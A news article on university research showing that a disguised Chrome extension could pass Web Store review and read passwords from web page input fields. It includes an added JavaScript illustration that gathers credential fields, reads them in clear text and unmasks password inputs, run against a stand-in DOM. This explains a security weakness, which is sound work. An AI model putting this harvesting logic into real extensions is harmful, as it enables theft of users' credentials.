Researchers from the University of Wisconsin at Madison have discovered a security weakness in Google Chrome's extension ecosystem. They built a proof-of-concept extension which, once it had passed Chrome Web Store moderation, could steal user passwords directly from the HTML source of web pages.
The root of the problem lies in the browser's existing permission model, which grants extensions full access to the DOM tree of the sites they run on, including potentially sensitive elements such as input fields.
The researchers argue that this model violates the principles of least privilege and complete mediation, which dictate that a program should hold only the rights it needs and that every access request should be checked. The current permission architecture establishes no strict security boundary between an extension and the elements of the page it runs on. As a result, an attacker can intercept data as the user types it, bypassing whatever protection the site itself applies.
To test the moderation process, the researchers created a fake extension posing as a ChatGPT-based assistant. Once installed, it could modify the HTML of a page when the user attempted to log in to a site, use CSS selectors to pick out the target input fields, and read their contents through the .value property. It could also replace password input fields, whose contents are masked, with plain-text ones.
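The following is an added illustration, not the researchers' extension or any code from the paper, of the three capabilities just described: a content script selects credential fields with CSS selectors, reads them through .value, and flips masked password fields to type="text". So that it runs under Node without a browser, it is written against a small constructed stand-in for the DOM (FakeDocument/FakeInput, which support only the input[attr="value"] selector shape the script uses); the sample login form, the selector list and the field values are likewise constructed for the example. In a real extension the same functions would be called on the page's document.

```javascript
// Credential-field selectors the content script targets (constructed for this example).
const TARGET_SELECTORS = [
  'input[type="password"]',
  'input[autocomplete="current-password"]',
  'input[type="email"]',
  'input[autocomplete="username"]',
  'input[name="username"]',
];

// Read the current contents of every matching field via the .value property.
// Masking only affects what is drawn on screen; .value returns the clear text.
function harvestFields(doc) {
  const seen = new Set();
  const results = [];
  for (const sel of TARGET_SELECTORS) {
    for (const el of doc.querySelectorAll(sel)) {
      if (seen.has(el)) continue; // a field may match more than one selector
      seen.add(el);
      results.push({
        name: el.getAttribute('name'),
        type: el.getAttribute('type'),
        value: el.value,
      });
    }
  }
  return results;
}

// Swap masked password fields for plain-text ones by rewriting the type attribute.
// Returns how many fields were changed.
function unmaskPasswordFields(doc) {
  let changed = 0;
  for (const el of doc.querySelectorAll('input[type="password"]')) {
    el.setAttribute('type', 'text');
    changed++;
  }
  return changed;
}

// --- Minimal stand-in for the browser DOM (constructed; not a real DOM) ---
class FakeInput {
  constructor(attrs, value = '') {
    this.attrs = { ...attrs };
    this.value = value;
  }
  getAttribute(name) { return name in this.attrs ? this.attrs[name] : null; }
  setAttribute(name, v) { this.attrs[name] = String(v); }
}

class FakeDocument {
  constructor(inputs) { this.inputs = inputs; }
  // Supports only selectors of the form input[attr="value"]; like a real
  // NodeList from querySelectorAll, the result is a static snapshot.
  querySelectorAll(selector) {
    const m = /^input\[([a-z-]+)="([^"]*)"\]$/.exec(selector);
    if (!m) throw new Error('unsupported selector in stand-in DOM: ' + selector);
    const [, attr, want] = m;
    return this.inputs.filter((el) => el.getAttribute(attr) === want);
  }
}

// A constructed login form with the values a user might have typed.
function buildSampleLoginForm() {
  return new FakeDocument([
    new FakeInput({ type: 'email', name: 'email', autocomplete: 'username' }, 'alice@example.com'),
    new FakeInput({ type: 'password', name: 'password', autocomplete: 'current-password' }, 'hunter2'),
    new FakeInput({ type: 'text', name: 'search' }, 'laptops'),
  ]);
}

// Run the whole sequence: harvest, unmask, harvest again.
function demo() {
  const doc = buildSampleLoginForm();
  const before = harvestFields(doc);
  const changed = unmaskPasswordFields(doc);
  const after = harvestFields(doc);
  return { before, changed, after };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Nothing here needs a privileged API: in a Manifest V3 extension this logic would simply be declared under content_scripts with a matches pattern for the target sites, which is why the page's point about the missing boundary between extension and page matters more than any individual permission.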
The fake extension contains no overtly malicious code and complies with all the requirements of Manifest V3, which is why it passed review and was published in the Chrome Web Store.
The researchers' analysis found that approximately 17,300 extensions in the Chrome Web Store hold permissions that give them access to sensitive page content, including popular ad blockers and shopping extensions with millions of downloads.
They further found that of the top 10,000 websites, about 1,100 store passwords in plain text within the page's HTML structure, and another 7,300 expose the contents of their input fields through the DOM access that extensions receive.
Notably, large platforms such as Gmail, Cloudflare, and Facebook were among the affected sites.
Google and Amazon, whose sites were also affected, have both responded. Amazon stated that customer security is a top priority and that it has directed developers to take immediate action; a Google representative confirmed that the company is investigating the issue.